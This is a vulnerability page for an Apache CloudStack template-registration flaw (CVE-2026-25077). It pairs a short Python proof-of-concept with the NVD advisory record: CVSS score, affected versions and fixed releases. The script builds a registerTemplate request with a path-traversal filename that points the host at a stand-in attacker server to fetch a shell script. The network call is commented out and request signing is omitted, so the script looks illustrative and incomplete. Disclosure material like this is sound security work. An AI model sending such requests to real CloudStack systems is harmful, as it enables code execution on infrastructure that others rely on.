CVE-2026-25077

# PoC for CVE-2026-25077: Apache CloudStack RCE via Malicious Template Registration # This script demonstrates how an attacker might register a template with a malicious filename. import requests # Target CloudStack API endpoint TARGET_URL = "http://target-cloudstack:8080/client/api" API_KEY = "YOUR_API_KEY" SECRET_KEY = "YOUR_SECRET_KEY" def exploit(): # The vulnerability lies in the filename parameter not being sanitized. # An attacker can use path traversal or malicious characters. malicious_filename = "../../../../tmp/malicious_payload.sh" # Construct the request to register a template # Note: Signature generation is required in a real scenario, omitted here for brevity params = { "command": "registerTemplate", "name": "ExploitTemplate", "displaytext": "CVE-2026-25077 PoC", "format": "QEMU2", "hypervisor": "KVM", "osTypeId": "1", "zoneId": "1", "url": f"http://attacker-server.com/{malicious_filename}", "checksum": "dummy_checksum" } print(f"[*] Sending malicious template registration request with filename: {malicious_filename}") try: # response = requests.get(TARGET_URL, params=params) # print(f"[+] Response Status: {response.status_code}") print("[!] If vulnerable, the malicious file is written to the KVM host storage.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-25077", "sourceIdentifier": "[email protected]", "published": "2026-05-08T13:16:36.133", "lastModified": "2026-05-10T15:16:27.330", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Account users are allowed by default to register templates to be downloaded directly to the primary storage for deploying instances using the KVM hypervisor. Due to missing file name sanitization, an attacker can register malicious templates to execute arbitrary code on the KVM hosts. This can result in the compromise of resource integrity and confidentiality, data loss, denial of service, and availability of the KVM-based infrastructure managed by CloudStack.\n\n\nUsers are recommended to upgrade to Apache CloudStack versions 4.20.3.0 or 4.22.0.1, or later, which fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.11.0.0", "versionEndExcluding": "4.20.3.0", "matchCriteriaId": "B26B4D15-F80A-4383-9960-DADA4363CE29"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.21.0.0", "versionEndExcluding": "4.22.0.1", "matchCriteriaId": "78690ED1-C4B3-4DC9-9B53-FB31D6D17125"}]}]}], "references": [{"url": "https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/09/6", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}